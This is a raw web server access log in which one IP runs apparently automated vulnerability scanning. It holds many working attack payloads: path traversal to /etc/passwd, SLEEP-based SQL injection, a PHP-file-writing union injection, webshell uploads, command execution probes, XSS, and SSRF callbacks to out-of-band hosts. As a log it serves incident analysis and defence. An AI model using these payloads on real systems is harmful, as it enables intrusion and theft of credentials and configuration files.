195.164.49.69 - - [18/Nov/2024:21:56:36 +0000] GET /jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:21:56:38 +0000] GET /workflow/jsp/logon.jsp HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:56:39 +0000] GET /Admin/Admin.aspx HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:56:42 +0000] GET /?q=./gibbon.sql HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:56:44 +0000] GET /api/v1/devices HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:56:46 +0000] GET /' HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:21:56:48 +0000] GET /secure/WBSGanttManageScheduleJobAction.jspa; HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:56:57 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:56:59 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:21:57:00 +0000] GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2p2bFf0cq3Cr5OA3Zo8ODxoXPEX.php:aaa HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:57:03 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:21:57:06 +0000] GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:21:57:08 +0000] POST /wp-json/pie/v1/login HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:57:10 +0000] GET /wp-content/plugins/wpcargo/includes/2p2bFiDLaHCzuR4YBfNbp4fZ7N5.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:21:57:12 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:57:14 +0000] GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:57:16 +0000] POST /RPC2_Login HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:57:18 +0000] GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:57:20 +0000] GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:57:22 +0000] GET /?pum_action=tools_page_tab_system_info HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:57:28 +0000] POST /lib/crud/userprocess.php HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:57:30 +0000] POST /forgot_password.php HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:57:32 +0000] POST /convert HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:57:34 +0000] GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:57:35 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:57:39 +0000] POST /auth/requestreset HTTP/1.1 404 1095
83.212.98.101 - - [18/Nov/2024:21:57:40 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:57:41 +0000] POST /auth/newpassword HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:57:43 +0000] POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:57:46 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:21:57:49 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:57:51 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:57:53 +0000] POST /login/ HTTP/1.1 404 1084
- - - [18/Nov/2024:21:57:55 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:57:57 +0000] GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2p2bFiDLaHCzuR4YBfNbp4fZ7N5.php HTTP/1.1 404 1137
195.164.49.69 - - [18/Nov/2024:21:58:01 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:58:03 +0000] POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:58:05 +0000] GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:58:07 +0000] GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:58:09 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:58:11 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:58:14 +0000] GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:58:15 +0000] GET /login.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:58:17 +0000] GET /modules/appagebuilder/config.xml HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:21:58:19 +0000] GET /file/YegEQ5.txt HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:58:21 +0000] GET /ext-js/index.html HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:58:22 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:58:24 +0000] POST /geoserver/wms HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:58:26 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:58:28 +0000] POST /classes/Master.php?f=delete_supplier HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:58:30 +0000] POST /templates/default/html/windows/right.php HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:58:32 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:58:35 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:21:58:36 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:58:38 +0000] POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:58:40 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:58:42 +0000] GET /wp-admin/profile.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:58:44 +0000] POST /wp-content/plugins/wpcargo/includes/2p2bFiDLaHCzuR4YBfNbp4fZ7N5.php?1=var_dump HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:21:58:44 +0000] GET /csrf HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:21:58:48 +0000] GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(7)))a)--%20- HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:58:50 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:58:52 +0000] GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:58:54 +0000] GET /spip.php?page=spip_pass HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:58:56 +0000] GET /api/v1/users HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:59:03 +0000] POST /lib/crud/userprocess.php HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:59:05 +0000] POST /modules/appagebuilder/apajax.php?rand=202191307831 HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:21:59:07 +0000] POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:21:59:09 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:59:10 +0000] POST /classes/Login.php?f=login HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:59:12 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:59:14 +0000] POST /enrollment/ajax.php?action=login HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:59:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:59:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:59:22 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:59:23 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:21:59:26 +0000] GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:59:28 +0000] GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:59:30 +0000] POST /modules/miniform/ajax_delete_message.php HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:59:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:59:36 +0000] GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:59:38 +0000] GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:21:59:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:59:51 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:21:59:53 +0000] POST /modules/appagebuilder/apajax.php?rand=7835127559856 HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:21:59:55 +0000] POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:59:57 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:21:59:59 +0000] GET /api/v3/user/orgs HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:22:00:01 +0000] POST /wp-json/notificationx/v1/analytics HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:22:00:03 +0000] GET /enrollment/index.php?page=home HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:00:07 +0000] POST /task/submit/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:00:11 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:00:13 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:22:00:14 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:00:16 +0000] GET /?p=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:00:18 +0000] GET /welcome HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:00:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:00:22 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:00:24 +0000] GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1 404 1128
195.164.49.69 - - [18/Nov/2024:22:00:26 +0000] GET /?es=optin&hash=eyJtZXNzYWdlX2lkIjowLCJjYW1wYWlnbl9pZCI6MCwiY29udGFjdF9pZCI6Int7Y29udGFjdF9pZH19IiwiZW1haWwiOiJ7e2VtYWlsfX0iLCJndWlkIjoiZGlid29sLXFhaWViZC1xdnJna3AtbGh5b3BtLXJteWZ6byIsImxpc3RfaWRzIjpbInNsZWVwKDMpIl0sImFjdGlvbiI6InN1YnNjcmliZSJ9 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:00:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:00:30 +0000] GET /?p=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:00:32 +0000] GET /default.aspx HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:00:39 +0000] POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 404 1135
195.164.49.69 - - [18/Nov/2024:22:00:40 +0000] GET /solr/admin/info/properties:/admin/info/key HTTP/1.1 404 1140
195.164.49.69 - - [18/Nov/2024:22:00:42 +0000] POST /modules/appagebuilder/apajax.php?rand=1326991330003 HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:00:46 +0000] POST /wp-json/post-smtp/v1/connect-app HTTP/1.1 404 1118
83.212.98.101 - - [18/Nov/2024:22:00:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:00:50 +0000] POST /webtools/control/view/StatsSinceStart HTTP/1.1 404 1123
195.164.49.69 - - [18/Nov/2024:22:00:52 +0000] POST /device/description_en.html HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:00:54 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:22:00:54 +0000] GET /login?next=/ HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:00:59 +0000] PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:01:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:01:05 +0000] GET /vicidial/welcome.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:01:06 +0000] POST /apisix/admin/user/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:01:09 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:01:10 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:01:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:01:15 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:22:01:17 +0000] POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:01:37 +0000] PUT /2p2bFf71Rjix47uSodXouqbeAQn.json HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:01:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:01:48 +0000] GET /wp-json/post-smtp/v1/get-log HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:01:49 +0000] GET /J3RCXe HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:01:56 +0000] POST /.antproxy.php HTTP/1.1 404 1087
c2x8go.xff"> - - [18/Nov/2024:22:01:58 +0000] GET /?e42dhy=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:02:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:02:04 +0000] POST /plugin/add HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:02:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:02:08 +0000] POST /admin/ajax.php?action=login HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:02:10 +0000] GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:02:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:02:14 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:02:16 +0000] POST /process/aprocess.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:02:18 +0000] POST /login/dologin HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:02:20 +0000] GET / HTTP/1.1 200 11204
- - - [18/Nov/2024:22:02:21 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:02:23 +0000] POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1 404 1164
195.164.49.69 - - [18/Nov/2024:22:02:27 +0000] GET /2p2bFf71Rjix47uSodXouqbeAQn.json HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:02:29 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:02:31 +0000] POST /MUP/ HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:02:33 +0000] POST /directdata/direct/router HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:02:35 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:02:37 +0000] GET /heapdump HTTP/1.1 404 1082
83.212.98.101 - - [18/Nov/2024:22:02:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:02:39 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:02:42 +0000] POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356) HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:02:45 +0000] POST /search HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:02:47 +0000] GET /?e42dhy=1 HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:02:52 +0000] POST /plugin/customMethod HTTP/1.1 404 1097
- - - [18/Nov/2024:22:02:53 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:02:57 +0000] GET /admin/index.php?page=home HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:02:59 +0000] POST /defaultroot/upload/fileUpload.controller HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:22:03:03 +0000] GET /user.php?act=login HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:03:05 +0000] POST /res.php HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:03:06 +0000] POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:03:09 +0000] GET /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgZWNobyBtZDUoIndlYXZlci1ncm91cC14bWwtc3FsaSIpO3VubGluayhfX0ZJTEVfXyk7Pz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2RmaXJwLnBocCdd HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:03:11 +0000] GET /2p2bFl8tNVQzx8J3TQ1I1CmmdPR.txt HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:03:13 +0000] POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:03:15 +0000] POST /lcms/index.php HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:03:17 +0000] GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','999999999')),3,32)-- HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:03:18 +0000] GET /2p2bFfbFzPaj4adMqjYcCCLtZc0.txt HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:03:20 +0000] GET /api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:03:23 +0000] GET /user/sign_up HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:03:25 +0000] GET /actuator/heapdump HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:03:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:03:30 +0000] POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356) HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:03:33 +0000] GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:03:35 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:03:37 +0000] GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1 404 1141
- - - [18/Nov/2024:22:03:38 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:03:40 +0000] GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:03:42 +0000] GET /config_application.txt HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:03:44 +0000] GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1 404 1140
195.164.49.69 - - [18/Nov/2024:22:03:46 +0000] GET /.env HTTP/1.1 404 1078
- - - [18/Nov/2024:22:03:50 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:03:52 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1 404 1104
- - - [18/Nov/2024:22:03:54 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:03:56 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:03:58 +0000] GET /dfirp.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:04:00 +0000] GET /spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:04:02 +0000] GET /author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:04:04 +0000] GET /current_config/passwd HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:04:06 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:04:08 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:04:10 +0000] GET /horde/admin/user.php HTTP/1.1 404 1102
77.87.163.227 - - [18/Nov/2024:22:04:11 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [18/Nov/2024:22:04:12 +0000] GET /console/login/LoginForm.jsp HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:22:04:14 +0000] GET /assets/../package.json HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:04:17 +0000] GET /download.php?file=/etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:04:20 +0000] GET /lab.html?vpath=//interact.sh HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:04:22 +0000] GET /inventory HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:04:24 +0000] GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:04:26 +0000] GET /appsettings.json HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:04:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:04:30 +0000] GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:04:32 +0000] GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:22:04:32 +0000] GET /?url=http://0177.0.0.1/server-status HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:04:36 +0000] GET /v1/folder?path=%2F HTTP/1.1 404 1087
- - - [18/Nov/2024:22:04:38 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:04:41 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:04:42 +0000] GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1 404 1104
- - - [18/Nov/2024:22:04:44 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:04:46 +0000] GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:04:48 +0000] GET /admin/elfinder/elfinder-cke.html HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:04:50 +0000] GET /nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:04:52 +0000] GET /cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1 HTTP/1.1 404 1098
- - - [18/Nov/2024:22:04:54 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:04:56 +0000] GET /getFavicon?host=http://oast.fun/ HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:04:58 +0000] GET /cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:04:59 +0000] GET /admin/user.php HTTP/1.1 404 1092
- - - [18/Nov/2024:22:05:02 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:05:04 +0000] OPTIONS / HTTP/1.1 200 -
195.164.49.69 - - [18/Nov/2024:22:05:07 +0000] GET /current_config/Sha1Account1 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:05:09 +0000] GET /AdminPage/conf/runCmd?cmd=id HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:05:11 +0000] GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:05:13 +0000] GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:22:05:15 +0000] GET /appsettings.Production.json HTTP/1.1 404 1101
